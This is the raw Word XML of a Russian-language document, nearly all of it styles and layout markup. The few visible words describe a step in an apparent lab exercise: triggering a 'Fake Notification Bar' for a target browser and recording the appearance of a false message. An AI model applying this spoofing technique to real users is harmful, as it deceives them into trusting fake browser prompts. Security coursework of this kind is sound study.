          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fake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Notification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для версии браузера </w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>цель</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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111A3CE7" wp14:editId="369F13A7">
            <wp:extent cx="5940115" cy="2921000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="385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F49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Шаг 5. Зафиксировать появление нашего ложного сообщения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00E11CC9">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7FBDFC36" wp14:editId="36819330">
            <wp:extent cx="4761754" cy="2877732"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="335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 rotWithShape="1">
                    <a:blip r:embed="rId174"/>
                    <a:srcRect b="10548"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4761754" cy="287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F49CB" w:rsidRPr="00EF49CB">
      <w:headerReference w:type="even" r:id="rId175"/>
      <w:footerReference w:type="default" r:id="rId176"/>
      <w:headerReference w:type="first" r:id="rId177"/>
      <w:pgSz w:w="11900" w:h="16840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3075" w:rsidRDefault="009F3075">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009F3075" w:rsidRDefault="009F30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ungsuh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1AC4" w:rsidRDefault="00401AC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firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00DE2FD7">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>7</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000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3075" w:rsidRDefault="009F3075">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009F3075" w:rsidRDefault="009F307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1AC4" w:rsidRDefault="00401AC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Cs w:val="28"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00401AC4" w:rsidRDefault="00401AC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Cs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:szCs w:val="28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01AC4" w:rsidRDefault="00401AC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Cs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206C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2AC805E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decimal"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2833" w:hanging="1044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25F19DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6AB4175C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left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8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03981AAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03B470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07D5311B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="133EB73A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="709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1418" w:hanging="709"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="709"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="709"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="709"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="709"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="709"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="709"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1418" w:hanging="709"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="093E4AAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C302E0EA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0F8E6309"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17A42D40"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="213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7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1E3631D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36A4C0D8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14471260"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A7EACD0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="213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6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1DE63C3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E468A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>
    <w:nsid w:val="22194376"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="717AF3C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>
    <w:nsid w:val="230A6DD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6ED205DC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="214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6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0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2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6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8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09" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:nsid w:val="37E350EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5EC89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A80CD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B803B2A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1578" w:hanging="869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>
    <w:nsid w:val="3B3E66FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D56F5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D5A73C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98989F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E42290C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF1C1AC6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="249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1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3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5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37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09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1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3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57" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16">
    <w:nsid w:val="45AF1622"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC1C2B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A7C2F0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C92AEF58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8">
    <w:nsid w:val="4EB95453"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87BCB082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9">
    <w:nsid w:val="50D0050E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32CE7F96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54A04D16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00144C1E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1778" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:color w:val="FF0000"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2149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1">
    <w:nsid w:val="6B22524F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6987DE8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5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7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8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77D450E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5BC3A32"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left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8" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23">
    <w:nsid w:val="78FE7651"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A14927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7DDE7257"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC4EE1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8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="2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D47A62"/>
    <w:rsid w:val="000A1383"/>
    <w:rsid w:val="001411FD"/>
    <w:rsid w:val="00347A12"/>
    <w:rsid w:val="0038734E"/>
    <w:rsid w:val="00401AC4"/>
    <w:rsid w:val="004B5628"/>
    <w:rsid w:val="005272A5"/>
    <w:rsid w:val="005718D5"/>
    <w:rsid w:val="005B2EC9"/>
    <w:rsid w:val="005F5F9D"/>
    <w:rsid w:val="00693E65"/>
    <w:rsid w:val="009D31EE"/>
    <w:rsid w:val="009D4972"/>
    <w:rsid w:val="009F3075"/>
    <w:rsid w:val="00A638AB"/>
    <w:rsid w:val="00BE1EEA"/>
    <w:rsid w:val="00C451AE"/>
    <w:rsid w:val="00CF7B6D"/>
    <w:rsid w:val="00D47A62"/>
    <w:rsid w:val="00DE2FD7"/>
    <w:rsid w:val="00E11CC9"/>
    <w:rsid w:val="00EF49CB"/>
    <w:rsid w:val="00FF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2BC3"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DC35BD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines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35BD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine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link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DC35BD"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00474D3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nhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00474D3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nhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00474D3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4D3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4D3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4D3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3"/>
    <w:next w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00985485"/>
    <w:pPr>
      <w:spacing w:after="300"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007E677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DC35BD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08377C"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28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474D3C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474D3C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474D3C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="28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474D3C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474D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74D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5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00474D3C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a6">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00474D3C"/>
    <w:pPr>
      <w:spacing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4D3C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474D3C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474D3C"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00474D3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00474D3C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474D3C"/>
    <w:rPr>
      <w:sz w:val="24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474D3C"/>
    <w:pPr>
      <w:spacing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qFormat/>
    <w:rsid w:val="0050513A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9339"/>
      </w:tabs>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs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50513A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="851"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9339"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00474D3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74D3C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882CDA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="567"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9339"/>
      </w:tabs>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD541B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1">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A18F8"/>
    <w:rPr>
      <w:color w:val="800080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50513A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="840"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C260C"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00982907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982907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982907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982907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982907"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Название Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00985485"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="52"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af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9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3" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="afc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Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00EF49CB"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af8">
    <w:name w:val="Подзаголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af7"/>
    <w:rsid w:val="00EF49CB"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="51">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="880" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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F49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1100" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1320" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1540" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibr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EF49CB"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="1760" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00EF49CB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF49CB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff0">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00EF49CB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF49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EF49CB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
